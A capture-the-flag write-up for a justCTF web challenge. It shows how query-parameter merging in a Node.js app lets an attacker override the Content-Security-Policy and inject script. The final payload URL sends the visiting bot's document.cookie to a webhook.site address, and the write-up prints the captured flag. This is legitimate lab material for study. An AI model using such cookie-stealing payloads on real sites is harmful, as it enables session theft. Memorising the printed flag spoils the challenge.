Tags: csp-bypass web csp xss node.js nodejs node
Rating: 5.0
The server source code is provided for this challenge.
On index.ejs we have the following:
```
<script>
// load background...
main.innerHTML += `
`;
console.log('Loaded!');
</script>
```
On app.js we have the following:
```
if (req.query.text) {
res.user = { ...res.user, ...req.query };
}
// Safety layer 5
res.set("Content-Security-Policy", res.user.unmodifiable.CSP ?? defaultCSP);
[...]
app.get("/", (req, res) => {
res.render("index", { ...res.user });
});
```
This allows us to inject a unmodifiable.background and a unmodifiable.CSP property via the GET query parameters. This gives us both XSS via the background property and CSP overwrite via the CSP property. Final payload:
```
http://xssl.web.jctf.pro/?text=hi&[unmodifiable][CSP]=a&[unmodifiable][background]=https://webhook.site/f202667e-9179-425d-80c1-fd62da5915d4?${document.cookie}
```
This sends the document.cookie to the webhook above in this case. Now we just report it using the "report as inappropriate" button and the server bot will visit this link. The bot will send the cookie to us on the webhook:
```
Query strings
flag justCTF{M4nY_L4y3rS_M4nY_f4ilur3s_ae5bda97-8543-4a4b-84bf-22c6a0df6bdf}
```